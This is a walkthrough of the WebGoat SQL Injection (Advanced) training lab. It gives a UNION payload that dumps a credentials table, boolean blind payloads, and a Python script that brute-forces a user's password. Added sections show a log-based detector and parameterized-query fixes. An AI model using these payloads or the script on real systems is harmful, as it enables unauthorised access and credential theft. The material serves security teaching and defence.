Webgoat - SQL Injection (Advanced)

In this walkthrough, we will go through the SQL Injection (Advanced) section of the WebGoat labs. We will explore and exploit advanced SQL injection and learn how applications are affected by it. So, let's get started with the hacking without any delay.

SQL Injection (Advanced)

1. Pulling data from other tables

  • In this challenge, we will use a SQL injection payload to dump all the data from another table.

Incorrect solution

  • I used the payload below to dump another table from the DB.

Smith' UNION SELECT userid, user_name, password, cookie, null, null, null FROM user_system_data; -- -

Dumped all data

2. Login Bypass

  • In this challenge we have to bypass authentication and log in as Tom.

  • On every failed attempt the application just shows a generic error message.

Login failed

  • I tried the payload below in the user registration functionality and got a "user already exists" message. That means the field is vulnerable to SQL injection, as it executed our query in the background and displayed the result of a TRUE statement.

tom' AND '1'='1

payload

  • Next we tried to test whether the user's password starts with the letter t, and it was confirmed again with a TRUE statement.

tom' AND substring(password,1,1)='t

User already exist

  • After this point, I also tried using sqlmap but had no luck. So I used the script below to brute-force the password manually with the help of the above payload and TRUE statements.

import json
import requests

# Session cookie of the logged-in WebGoat user: copy it from your own requests once logged in.
JSESSIONID = "5g5R4McsS89BVEPZyyuVpS_dOatOzBFP6Jy6qDa8"
TARGET = "http://localhost/WebGoat/SqlInjectionAdvanced/challenge"
# Text the registration endpoint returns when the injected condition is TRUE
SUCCESS_MARKER = "already exists please try to register with a different username"


def sql_injection_advance_5():
    alphabet = 'abcdefghijklmnopqrstuvwxyz'  # the challenge password contains lowercase letters only
    alphabet_index = 0
    password_index = 0
    password = ''

    headers = {
        'Cookie': "JSESSIONID=" + JSESSIONID
    }

    while True:
        # Boolean condition on one character of tom's password, tested through the username field
        payload = "tom' AND substring(password,{},1)='{}".format(password_index + 1, alphabet[alphabet_index])

        data = {
            'username_reg': payload,
            'email_reg': 'a@a',
            'password_reg': 'a',
            'confirm_password_reg': 'a'
        }

        r = requests.put(TARGET, headers=headers, data=data)

        try:
            response = r.json()
        except ValueError:
            print("Wrong JSESSIONID, find it by looking at your requests once logged in.")
            return password

        if SUCCESS_MARKER not in response["feedback"]:
            # FALSE: try the next letter at this position
            alphabet_index += 1
            if alphabet_index > len(alphabet) - 1:
                # no letter matched, so the previous position was the last character
                return password
        else:
            # TRUE: keep this character and move on to the next position
            password += alphabet[alphabet_index]
            print(password)
            alphabet_index = 0
            password_index += 1


if __name__ == '__main__':
    print("password:", sql_injection_advance_5())

  • Got the password and logged in to complete the challenge.

python3 script.py

Challenge completed
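From the defender's side, the script above leaves a very recognisable trail: one session sending dozens of registration requests to the same endpoint whose username field contains a quote followed by AND and a substring() call. The following is an added example, not code from the walkthrough or from WebGoat, that parses a constructed application log (the line format and session ids are made up; the endpoint path and the username_reg field are the ones the walkthrough uses) and flags sessions that send repeated injection-shaped usernames, while leaving a legitimate name with an apostrophe alone.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not taken from the page): one registration
# attempt per line with the session id and the submitted username_reg value.
SAMPLE_LOG = """\
PUT /WebGoat/SqlInjectionAdvanced/challenge sid=SESSION-A username_reg=alice
PUT /WebGoat/SqlInjectionAdvanced/challenge sid=SESSION-B username_reg=tom' AND '1'='1
PUT /WebGoat/SqlInjectionAdvanced/challenge sid=SESSION-B username_reg=tom' AND substring(password,1,1)='a
PUT /WebGoat/SqlInjectionAdvanced/challenge sid=SESSION-B username_reg=tom' AND substring(password,1,1)='b
PUT /WebGoat/SqlInjectionAdvanced/challenge sid=SESSION-B username_reg=tom' AND substring(password,2,1)='a
PUT /WebGoat/SqlInjectionAdvanced/challenge sid=SESSION-C username_reg=o'brien
"""

LINE_RE = re.compile(
    r"^(?P<method>\S+) (?P<path>\S+) sid=(?P<sid>\S+) username_reg=(?P<user>.*)$"
)

# Fingerprint of the walkthrough's payloads: a quote that closes the SQL string
# literal, a boolean operator, then either a substring() call or the '1'='1
# tautology. A bare apostrophe inside a name (o'brien) does not match.
INJECTION_RE = re.compile(
    r"'\s*(AND|OR)\b.*?(substring\s*\(|'1'\s*=\s*'1)", re.IGNORECASE
)


def parse_log(text):
    """Turn the constructed log text into a list of dicts, skipping malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def is_injection_shaped(username):
    return INJECTION_RE.search(username) is not None


def flag_sessions(events, threshold=3):
    """Return {sid: count} for sessions whose registration attempts carried an
    injection-shaped username at least `threshold` times. The threshold keeps a
    single odd-looking request from paging anyone; character-by-character
    enumeration needs many requests per recovered letter."""
    counts = defaultdict(int)
    for ev in events:
        if is_injection_shaped(ev["user"]):
            counts[ev["sid"]] += 1
    return {sid: n for sid, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for sid, n in flag_sessions(parse_log(SAMPLE_LOG)).items():
        print("suspicious session", sid, "with", n, "injection-shaped registrations")
```

A real deployment would read the web server or application access log rather than an inline string, and would key the count on session id plus client address; the pattern itself (one session, one endpoint, a burst of quote-plus-operator usernames) is what matters.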

3. The Quiz

Conclusion

So, we finally completed the WebGoat SQL Injection (Advanced) vulnerability section. We can mitigate these types of attacks by performing input sanitization and using prepared statements or parameterized queries for every SQL query the application makes to the database. On that note, I will take your leave and will meet you in the next one with another WebGoat vulnerability writeup; till then, "Keep Hacking".
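To make the mitigation concrete, here is an added example (not code from the walkthrough or from WebGoat) that rebuilds both challenges against an in-memory SQLite database: a string-concatenated query beside its parameterized twin for the UNION challenge, and the same pair for the registration "does this user exist" check that the blind brute-force abused. The tables, column names and rows are constructed; the assumption that the first challenge's query filters on last_name is mine, taken from the fact that the payload begins with Smith'. SQLite spells the function substr() where the lab's database accepts substring(), so the blind payload is adjusted by that one word.

```python
import sqlite3


# Constructed in-memory stand-in for the two WebGoat tables named in the
# walkthrough. The user_data column names are an assumption chosen to line up
# with the seven columns the UNION payload selects; all row values are made up.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE user_data (
            userid INTEGER, first_name TEXT, last_name TEXT, cc_number TEXT,
            cc_type TEXT, cookie TEXT, login_count INTEGER);
        CREATE TABLE user_system_data (
            userid INTEGER, user_name TEXT, password TEXT, cookie TEXT);
        INSERT INTO user_data VALUES (1, 'John', 'Smith', '4111-0000-0000-0001', 'VISA', '', 0);
        INSERT INTO user_data VALUES (2, 'Jane', 'Doe',   '4111-0000-0000-0002', 'MC',   '', 0);
        INSERT INTO user_system_data VALUES (1, 'jsmith', 'letmein1', '');
        INSERT INTO user_system_data VALUES (2, 'tom',    'tiger42',  '');
    """)
    return conn


# --- Challenge 1: the "pull data from other tables" lookup -------------------

def lookup_vulnerable(conn, last_name):
    # String concatenation: the user's text is parsed as SQL, so a quote ends
    # the literal and UNION appends rows from a table the query never named.
    sql = "SELECT * FROM user_data WHERE last_name = '" + last_name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, last_name):
    # Bound parameter: the statement is parsed first and the value attached
    # afterwards, so it can only ever be compared as a string.
    sql = "SELECT * FROM user_data WHERE last_name = ?"
    return conn.execute(sql, (last_name,)).fetchall()


# --- Challenge 2: the registration "does this user exist" check ---------------

def username_taken_vulnerable(conn, username):
    # Same defect: an injected AND condition turns the existence check into an
    # oracle about any column of the matched row.
    sql = "SELECT 1 FROM user_system_data WHERE user_name = '" + username + "'"
    return conn.execute(sql).fetchone() is not None


def username_taken_parameterized(conn, username):
    sql = "SELECT 1 FROM user_system_data WHERE user_name = ?"
    return conn.execute(sql, (username,)).fetchone() is not None


# The walkthrough's payloads (substring() spelled substr() for SQLite).
UNION_PAYLOAD = ("Smith' UNION SELECT userid, user_name, password, cookie, null, null, null "
                 "FROM user_system_data; -- -")
BLIND_TRUE = "tom' AND substr(password,1,1)='t"   # tom's constructed password starts with t
BLIND_FALSE = "tom' AND substr(password,1,1)='x"


def run_comparison():
    """Run every payload through the vulnerable and the parameterized version."""
    conn = build_db()
    return {
        "union_vulnerable": lookup_vulnerable(conn, UNION_PAYLOAD),
        "union_parameterized": lookup_parameterized(conn, UNION_PAYLOAD),
        "blind_vulnerable": (username_taken_vulnerable(conn, BLIND_TRUE),
                             username_taken_vulnerable(conn, BLIND_FALSE)),
        "blind_parameterized": (username_taken_parameterized(conn, BLIND_TRUE),
                                username_taken_parameterized(conn, BLIND_FALSE)),
    }


if __name__ == "__main__":
    for name, value in run_comparison().items():
        print(name, value)
```

The vulnerable lookup returns the Smith row plus every row of user_system_data, and the vulnerable existence check answers TRUE for the first blind payload and FALSE for the second, which is exactly the oracle the brute-force script needs. The parameterized versions return nothing and FALSE for every payload, because no row has a last_name or user_name equal to the whole injected string; the quote never reaches the SQL parser as syntax.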